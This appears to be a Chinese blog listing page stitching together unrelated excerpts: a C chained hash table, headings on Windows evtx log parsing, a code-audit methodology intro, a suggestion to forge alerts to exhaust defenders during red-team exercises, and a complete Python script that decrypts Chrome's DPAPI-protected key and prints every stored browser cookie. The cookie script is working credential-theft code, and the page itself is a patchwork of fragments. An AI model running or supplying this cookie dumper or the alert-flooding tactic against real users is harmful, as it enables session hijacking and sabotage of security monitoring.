数据结构
1 #include <stdlib.h>
#include <string.h>
#include <stdio.h>
/* One entry of a bucket's singly linked collision chain. */
typedef struct hash_node {
void *key; /* stored as given; hash_33() and get_val() treat it as a NUL-terminated string */
void *val; /* opaque payload; the table neither copies nor frees it (no destroy routine in this listing) */
struct hash_node *next; /* next node in the same bucket, NULL at the end of the chain */
} hash_node;
/* Chained hash table: `size` buckets, each the head pointer of a hash_node list. */
typedef struct hash_table {
hash_node **table; /* array of `size` bucket heads; NULL means the bucket is empty */
int size; /* bucket count; hash_table_create() sets 1024 */
// hashmask https://its301.com/article/qing_gee/120260024
int sizemask; /* size - 1; only a valid mask while size is a power of two, since bucket = hash & sizemask */
} hash_table;
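/*
 * DJB2-style "times 33" string hash: h = h * 33 + c over every byte of the
 * NUL-terminated string, starting from 5381.
 *
 * str: NUL-terminated string; must not be NULL (it is dereferenced
 *      unconditionally).
 * Returns the hash with the top bit cleared so it fits a non-negative int.
 *
 * Bytes are read as unsigned char, so the value no longer depends on whether
 * plain char is signed on the target platform (the original read *str as
 * char, which sign-extends bytes >= 0x80 on most x86 toolchains).
 */
unsigned int hash_33(const char *str) {
unsigned int hash = 5381;
for (const unsigned char *p = (const unsigned char *) str; *p != '\0'; p++) {
hash = (hash << 5) + hash + *p; /* hash * 33 + c; unsigned wrap is well defined */
}
return hash & 0x7FFFFFFF;
}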
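/*
 * Allocate an empty table with 1024 buckets (a power of two, so that
 * sizemask = size - 1 reduces a hash to a bucket index).
 *
 * Returns the new table, or NULL if either allocation fails. Nothing is
 * leaked on the failure path (the original returned NULL without freeing
 * the table struct when the bucket array could not be allocated).
 * Ownership of the returned table passes to the caller.
 */
hash_table *hash_table_create(void) {
hash_table *hashTable = malloc(sizeof *hashTable);
if (hashTable == NULL) return NULL;
hashTable->size = 1024;
hashTable->sizemask = hashTable->size - 1;
/* calloc sizes the bucket array and zeroes every head pointer in one step */
hashTable->table = calloc((size_t) hashTable->size, sizeof *hashTable->table);
if (hashTable->table == NULL) {
free(hashTable);
return NULL;
}
return hashTable;
}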
//这个节点相当于是单链表
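/*
 * Allocate a detached chain node holding key and val.
 *
 * The pointers are stored as given: nothing is copied, so key and val must
 * outlive the node. Returns NULL if allocation fails.
 *
 * The original discarded both arguments and stored NULL for the key, which
 * later made get_val() hash a NULL pointer.
 */
hash_node *hash_node_create(void *key, void *val) {
hash_node *hashNode = malloc(sizeof *hashNode);
if (hashNode == NULL) return NULL;
hashNode->key = key;
hashNode->val = val;
hashNode->next = NULL;
return hashNode;
}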
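/*
 * Insert key/val at the head of key's bucket chain.
 *
 * key is hashed as a NUL-terminated string and must not be NULL. Inserting
 * an existing key adds a second node in front of the old one; get_val()
 * then returns the newest value. Returns hashTable on success, or NULL if
 * the node could not be allocated, in which case the table is unchanged
 * (the original dereferenced the NULL node).
 */
hash_table *hash_table_insert(hash_table *hashTable, void *key, void *val) {
unsigned int hash = hash_33(key);
int pos = (int) (hash & (unsigned int) hashTable->sizemask);
hash_node *hashNode = hash_node_create(key, val);
if (hashNode == NULL) return NULL;
/* push onto the bucket's chain head */
hashNode->next = hashTable->table[pos];
hashTable->table[pos] = hashNode;
return hashTable;
}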
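/*
 * Look up key and return the value stored with it, or NULL if absent.
 *
 * key is compared by contents with strcmp(), so two distinct keys whose
 * hash_33() values collide are no longer confused: the original compared
 * only hash values and returned the wrong node's value on a collision.
 * Nodes with a NULL key (as produced by the unfixed hash_node_create) are
 * skipped instead of being dereferenced.
 */
void *get_val(hash_table *hashTable, void *key) {
unsigned int hash = hash_33(key);
int pos = (int) (hash & (unsigned int) hashTable->sizemask);
const char *wanted = key;
for (hash_node *current = hashTable->table[pos]; current != NULL; current = current->next) {
if (current->key != NULL && strcmp(current->key, wanted) == 0) {
return current->val;
}
}
return NULL;
}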
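/* Free every node chain, the bucket array and the table itself. Keys and
 * values are not freed: the table never owned them. */
static void hash_table_destroy(hash_table *hashTable) {
if (hashTable == NULL) return;
for (int i = 0; i < hashTable->size; i++) {
hash_node *current = hashTable->table[i];
while (current != NULL) {
hash_node *next = current->next;
free(current);
current = next;
}
}
free(hashTable->table);
free(hashTable);
}

/* Smoke test: insert one string key and read it back.
 * Exits non-zero if the table or node could not be allocated; a missing key
 * prints a marker instead of passing NULL to puts(), which was undefined
 * behavior in the original. Everything allocated is released before exit. */
int main(void) {
hash_table *hashTable = hash_table_create();
if (hashTable == NULL) {
fputs("hash_table_create failed\n", stderr);
return 1;
}
if (hash_table_insert(hashTable, "test1", "dsafasdfads") == NULL) {
fputs("hash_table_insert failed\n", stderr);
hash_table_destroy(hashTable);
return 1;
}
const char *val = get_val(hashTable, "test1");
puts(val != NULL ? val : "(not found)");
hash_table_destroy(hashTable);
return 0;
}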
windows evtx日志解析
在溯源过程中使用Log Parser,Event Log Explorer之类的工具需要熟悉工具的语法,有的还要收费,遇到大文件打开还会卡死
1 hw的时候防守方都是几百号人对几支攻击队,加上内网一大堆告警设备有些烦
一个恶心流量设备的小方法,可以通过伪造告警,耗尽防守方体力
Chrome 解密
"""
1:获取local state文件位置
2:获取加密的key(base64编码)
3:DPAPI解密
4:ase-gcm解密
5:解析sqllite文件
"""
import os
import json
import base64
import win32crypt
import sqlite3
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
def AESGCM_decode(key, data):
    """Decrypt one AES-GCM protected cookie value and return it as text.

    ``data`` is sliced as a 3-byte prefix that is skipped, a 12-byte nonce
    (bytes 3..15) and the ciphertext plus tag (bytes 15 onward); ``key`` is
    the raw AES key returned by ``get_key``. ``decrypt`` raises if the tag
    does not verify, and ``decode`` raises if the plaintext is not UTF-8.
    """
    nonce = data[3:15]
    ciphertext = data[15:]
    cipher = AESGCM(key)
    decrypted = cipher.decrypt(nonce, ciphertext, None)
    return decrypted.decode('utf-8')
def get_key():
    """Return the raw AES key that protects cookie values in this profile.

    Reads ``os_crypt.encrypted_key`` from the ``Local State`` JSON under
    ``%LOCALAPPDATA%``, base64-decodes it, drops the 5-byte ``DPAPI`` prefix
    and unwraps the remainder with ``CryptUnprotectData``, which only
    succeeds for the Windows user account that originally protected it.
    """
    local_state_path = os.path.join(
        os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State")  # key file
    with open(local_state_path, 'r', encoding='utf-8') as fh:
        encoded_key = json.load(fh)['os_crypt']['encrypted_key']
    wrapped_key = base64.b64decode(encoded_key)
    # the first five bytes are the literal "DPAPI" tag, not part of the blob
    dpapi_blob = wrapped_key[5:]
    return win32crypt.CryptUnprotectData(dpapi_blob, None, None, None, 0)[1]
def get_cookie():
    """Print every cookie of the default Chrome profile, decrypted.

    Opens the ``Cookies`` SQLite file in place, reads host, name and
    ``encrypted_value`` for all rows, then for each row prints the raw
    encrypted bytes followed by host, name and the decrypted text.
    """
    cookie_db = os.path.join(
        os.environ['USERPROFILE'],
        r'AppData\Local\Google\Chrome\User Data\default\Cookies')  # cookie file
    connection = sqlite3.connect(cookie_db)
    rows = connection.execute('select host_key,name,encrypted_value from cookies').fetchall()
    connection.close()
    key = get_key()
    for host, name, encrypted_value in rows:
        print(encrypted_value)
        print(host, name, AESGCM_decode(key, encrypted_value))
if __name__ == '__main__':
    # script entry point: dump the default profile's cookies to stdout
    get_cookie()
代码审计方法论
一、定义
软件代码审计是对软件项目源代码进行的全面分析,旨在发现错误、安全漏洞或违反编程约定之处。它是防御性程序设计范例的组成部分,试图在软件发布之前减少错误。C、C++、PHP 源代码是最常被审计的代码,因为许多高级语言(如 Python)具有较少的潜在易受攻击的函数(例如,不检查边界的函数)。——维基百科